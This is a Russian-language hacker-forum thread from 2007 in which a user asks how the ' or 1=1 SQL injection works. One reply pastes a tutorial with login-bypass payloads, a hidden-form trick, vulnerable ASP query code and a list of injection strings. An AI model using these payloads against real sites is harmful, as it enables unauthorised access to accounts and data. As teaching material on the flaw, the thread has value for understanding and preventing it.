Помогите найти

Discussion in 'Болталка' started by ЛифчиС5СВ, 18 Sep 2007.

  1. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Привет, мужики. Не могу найти второй раз (уже мельком видел, но не запомнил где) пост с разжевыванием сцути работы ' Or 1=1/*, 2 дня не могу найти то сообщение. То ли Пантеры, то ли Спайдера, то ли еще кто скидывал...
    Подскажите, плиз.
     
  2. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Суть в том, что учи синтаксис мускульных запросов.
     
  3. oof

    oof New Member

    Joined:
    14 Sep 2007
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Как мне проверить что то, что я нашел, уязвимость?

    Попробуйте начать с одиночной кавычки. Введите следующую строку:

    hi' or 1=1--

    в поле имя пользователя или пароль, или даже в URL параметре. Пример:

    Login: hi' or 1=1--
    Pass: hi' or 1=1--
    http://duck/index.asp?id=hi' or 1=1--

    Если вы делали это со скрытым полем, только загрузите исходный HTML, сохраните его на жестком диске, измените URL и скрытое поле соответственно. Пример:

    <FORM action=http://duck/Search/search.asp method=post>
    <input type=hidden name=A value="hi' or 1=1-- ">

    </FORM>

    Если удача на вашей стороне, вы войдете в систему без имени или пароля.
    Но почему ' or 1=1--?

    Давайте рассмотрим другой пример, который объясняет полезность конструкции ' or 1=1-- . Кроме обхода регистрации, также можно рассмотреть дополнительную информацию, которая обычно не доступна. Рассмотрим asp страницу, которая ссылается на другую страницу со следующим URL:

    http://duck/index.asp?category=food

    В URL, 'category' это имя переменной, и 'food' значение, назначенное этой переменной. Чтобы это сделать, asp страница может содержать следующий код:

    v_cat = request("category")
    sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs=conn.execute(sqlstr)

    как видно, наша переменная будет объединена с v_cat и таким образом SQL запрос должен стать:

    SELECT * FROM product WHERE PCategory='food'

    Этот запрос должен возвратить набор, содержащий одну или более строк, которые соответствуют условию WHERE, в этом случае 'food'. Теперь изменим URL следующим образом:

    http://duck/index.asp?category=food' or 1=1--
    SELECT * FROM product WHERE PCategory='food' or 1=1--

    Этот запрос возвратит все строки в таблице product, независимо от того, Pcategory равен 'food' или нет. Двойная черточка "-" сообщает, что MS SQL сервер игнорирует остальную часть запроса, которая следует за одиночной кавычкой ('). Иногда можно заменить двойную черточку на диез "#".

    Однако, если используется не SQL сервер, или вы не можете игнорировать остальную часть запроса, пробуйте:

    ' or 'a'='a

    Теперь SQL запрос станет:

    SELECT * FROM product WHERE PCategory='food' or 'a'='a'

    Этот запрос возвратит тот же самый результат.

    В зависимости от фактического SQL запроса, вероятно, придется пробовать некоторые из этих возможностей:

    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a
     
  4. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    +1
     
  5. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    мдя.. а репа то набита на топике со скулями а такое спрашиваешь((

    смысл в том что ты в запрос инжектишь еще часть Or 1=1/* следовательно добавляешь одно условие которое всегда истина.. ну а так как условие всегда истинно то и з базы возвращается результат ну и тебя аутентифицирует


    з.ы. почитай мат часть сразу все станет ясно да и много нового узнаешь)
     
    _________________________
  6. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Да я понимаю. )))) Но мне нужна полная расписанная статья))) Влом писать
     
  7. Архангел Тираэль

    Архангел Тираэль Elder - Старейшина

    Joined:
    11 Jul 2007
    Messages:
    11
    Likes Received:
    14
    Reputations:
    -1
    труд зделал из обезьяны человека, а из человека хакера. не ленись!
     
  8. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Ой, как же тяжело. Попросил только 1 - если кто видел - скинуть линк на статью, а мне тут столько наговорили уже. Ну что за глупая привычка, понтоваться и выпендриваться, вместо того, чтобы просто ответить на вопрос... ((((
    oоf, спасибо
     
  9. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Мда, oof, а ты показал на MSSQL
     
Loading...
Similar Threads - Помогите найти
  1. Turanchocks_
    Replies:
    2
    Views:
    1,529
  2. skillushqa_
    Replies:
    32
    Views:
    3,641